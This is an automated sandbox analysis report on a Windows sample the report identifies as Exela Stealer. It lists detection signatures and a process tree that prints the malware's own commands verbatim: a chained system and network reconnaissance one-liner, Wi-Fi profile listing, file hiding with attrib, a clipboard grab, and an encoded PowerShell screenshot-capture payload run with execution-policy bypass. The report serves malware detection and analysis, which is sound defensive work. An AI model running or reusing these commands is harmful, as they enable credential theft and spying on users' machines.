Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.22561.28030.exe

Overview

General Information

Sample name:SecuriteInfo.com.FileRepMalware.22561.28030.exe
Analysis ID:1543665
MD5:aecb2c382b2181620aa3243dcbca51c8
SHA1:9b103aa29dd1f39b7bb6261703f144bfdfa4a06e
SHA256:6b9568f25dba66dde3d01baa88ff15ce5165fed7c29c8446d8fab993234a49ce
Tags:exe
Infos:

Detection

Python Stealer, Exela Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Exela Stealer
Yara detected Python Stealer
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.22561.28030.exe (PID: 1292 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe" MD5: AECB2C382B2181620AA3243DCBCA51C8)
    • SecuriteInfo.com.FileRepMalware.22561.28030.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe" MD5: AECB2C382B2181620AA3243DCBCA51C8)
      • cmd.exe (PID: 5904 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3212 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6864 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7020 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2876 cmdline: wmic computersystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2132 cmdline: C:\Windows\system32\cmd.exe /c "gdb --version" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6204 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5580 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 3136 cmdline: C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4208 cmdline: wmic path Win32_ComputerSystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3840 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7136 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2580 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 1008 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5672 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 3184 cmdline: attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 5724 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3852 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2936 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 1968 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 5800 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2524 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 6104 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 3420 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2136 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2144 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4508 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6468 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 3532 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 3984 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 672 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 2404 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 4140 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 876 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • query.exe (PID: 3536 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 6204 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 6184 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3248 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 4052 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3048 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 6432 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 1908 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 5800 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3744 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 4208 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 7148 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 5916 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 7020 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 5700 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 6116 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 5060 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 7044 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 2876 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 5544 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 1408 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 5896 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4884 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 5504 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7120 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
    00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
      00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_ExelaStealerYara detected Exela StealerJoe Security
